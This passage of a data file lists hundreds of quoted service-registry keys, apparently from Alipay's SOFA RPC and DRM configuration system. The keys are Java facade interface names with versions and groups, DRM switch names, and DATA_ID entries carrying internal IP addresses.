FAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundcore.common.service.facade.DescartesUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:testplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillJFUserRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkopsmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.UserContractTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.UserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.volvo.common.service.facade.api.modeltestdata.ModelTestDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.strategy.HedgeStrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:imkteye@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-sendMailPMCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.core.AutoCarFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.unimetaservice.resource.facade.AigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.buservice.common.service.facade.PsUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.72.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_ZPERF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.transferprod.common.service.facade.api.TimeoutCallbackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.sla.SlaUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.campaign.CampaignQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.manage.facade.DtoRuntimeQueryFacade:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdataquery.common.service.facade.FinTntOutfluxQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.odpsUseFileSystem,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opsfree.facade.OpsfreeSubmitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promocenter_cicada_modify_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.106.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.157.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.dayutrprod.common.facade.monitor.LoadFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_S_1206_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:RELEASE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.intent.BotIntentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_ALI_RATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.vehownerprod.facade.designateddriving.DesignatedDrivingCallBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.186.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundprod.common.service.facade.product.query.PortfolioQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.open.openplatform.product.ProductExperienceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.deduct.PDeductSignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-sage@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskTaskActionExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.DepartmentFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:mobilerelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.fengdieTemplateName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cnamlreport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:route_config@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardsales.common.service.facade.PcardMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.bankcard.facade.SignQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RISKMODELCENTERMETA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.conf.facade.XViewMetadataService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.4.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.gfintertrade.common.service.facade.api.InterTradeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.mobilerelation.common.service.facade.AlipayRelationRecommendCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cifin.cifObDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:assetfluxdecision.product.assetFluxDecisionProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:scardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.escrowexprod.common.service.facade.EscrowExtServiceFacade:1.0:uniontrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.reDeclareBlacklist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.common.service.facade.api.client.EinvServerInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.writeIntoPackagefeeLogMaster,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.ContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.query.FundAssetProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.drmRollBackAll,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.appName:name=com.alipay.fc.fluxcons.biz.service.impl.drm.FluxConsDrmResource.preorder,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:customscenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:securitysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.GiftFamilyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprodtrans.facade.RecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-cifin-timeslice#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.airbops.service.common.proxy.tradequery.facade.ProxyTradeModelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.application.nodes.StreamNodeService:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintranscore.common.service.facade.trans.FinRedeemFacade:1.0:dqtranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:katongprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.revcore.obrevcore_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dataquality:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.facade.ArticleTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.batchAuditSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.assetflux.service.assettool.spi.AssetToolCreditService:1.0:discount-credit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oa_ProcessCallbackwl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@aircoreservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.promoguard.common.service.facade.metadata.api.BizModelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.191.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:porder@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.common.service.facade.api.PPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.signup.ClvUserBlackListService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkperf.common.service.facade.check.service.smartinterface.ExecuteRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.RoleFacade:1.0:iam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.StorePluginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insautobff:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.play.AlipayPointPlayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","fporgassetnet@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.33.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.campaign.mng.SearchStrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:cffilefactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.bigfish:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0:microloan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.contractQueryWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.zdal.ldc.tair.bankcardTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipromotion.common.service.facade.api.discount.DiscountConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.capitalpool.api.CapitalPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ecocheck.biz.cache.CacheServiceManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.api.UserServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmGraySwitchConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.shop.triple.TripleOpenShopService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.supportInstallNums,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:secucommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINFUNDCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edeductcenter.common.service.facade.EdeductUserOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.:name=com.alipay.rep.event.drm.StandardEventResource.filterPreEnvIpListWhenEventReleasing,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:antcloud_ac@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.cache.DrmMappingRuleCacheRefresh.ruleCacheRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@ikbservcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_11.158.40.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.contentlib.common.service.facade.content.TalentTagRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskService:1.0.0:processmng-taskService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:filefactory#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ctu.service.query.facade.CtuRuleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_USER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openeval.common.service.facade.eval.algorithm.AlgorithmEvalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.facade.monitor.bussiness.daas.MonitorTRule4DaasFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.jiaofei.FareHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.esp.endpoint.hbase.AppRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:asttshipcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iinnertrans.facade.api.InnerAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbinteligentpromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArCollectBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.integration.masterdata.result.code.SystemResultCodeMapQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsupport.common.service.facade.serial.CommonSerialNoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-fdbudget-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:instantCompContentDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.BigShowConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.business.BusinessAssessManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.biz.manager.template.TemplateInstanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IECPPROD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.auth_center.common.service.facade.res.ManagedResourceService:1.0:internal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.blog.BlogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:seekers@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.228.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:meshycommander@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.outsideasset.facade.OutsideAssetBindRelationQueryServiceFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.user.HrVacationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.serverLoadTestStoreType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cif:name=com.alipay.cif.client.drm.AntPassportSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.dataphin.openapi.StreamJobOperationService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.portfolio.drm.PortfolioProductCreateDrm.rebalanceRecords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.common.service.integration.mydds.BroadNamePred2Client:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:financemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.172.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcbmarketcenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditcardcenter.service.facade.unioncard.agreement.HbUnionCardAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.cashier.common.service.facade.spi.WithdrawOrderResolveService:1.0:apfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.paymentMerchantQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.imtmsvcprod.common.service.integration.dapply.mdeviceprod.DeviceItemRuleFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcam_apply_order_timeout_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inslifeprod.common.LifeProdBizInfoFetcherComponent:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promohelix.common.service.facade.api.sci.TaskAppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finriskeventseek.facade.ChangeEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.159.199.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.data.process.facade.operationrecord.DataProcessOperationRecordService:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:webterminal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-depositDirectReceiptPMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.openapi.InstanceOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmembermng.common.service.facade.growth.GrowthTargetUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:das@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:mobilecodec#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.custdecision.service.permlimit.facade.CompareResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:peerpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_PCTDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antiep.common.service.facade.AntiepOpActivityGzFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iinnertrans.facade.api.InnerAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.consistmanager.ConsistTaskManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdevice.common.service.facade.device.DeviceActiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.AsyncOperationResource.stringIsChargeRefundAsyncLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finaicontentcore.api.infosec.InfosecKeyWordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:overseaexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdispute.facade.api.DisputeTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rassistcenter.common.service.facade.api.IntvDailySummaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.recruit.api.RecruitMetadataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.channel.ExternalChannelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementHistoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.spcenter.facade.common.ChinaDistrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.backendfacade.api.CampQueryFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.biz.service.impl.sync.MobileSyncUpstreamGzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbmemberprod.common.service.facade.api.tr.right.UserRightTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mydds:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.26.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_FDP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfbsc.facade.api.cashallocation.CashAllocationFacade:1.0:cashAllocationFacadeImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.drm.BizCertifyRuleGreySwitch.readAllFromParamCenter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acpmscore.facade.DeliverableFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.common.event.UniformEventTxSynMessageListener:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincorecheck.common.service.facade.bizcheck.PaymentCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.HufuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.funddiversion.FundDegradeManageFacade:1.0@DEFAULT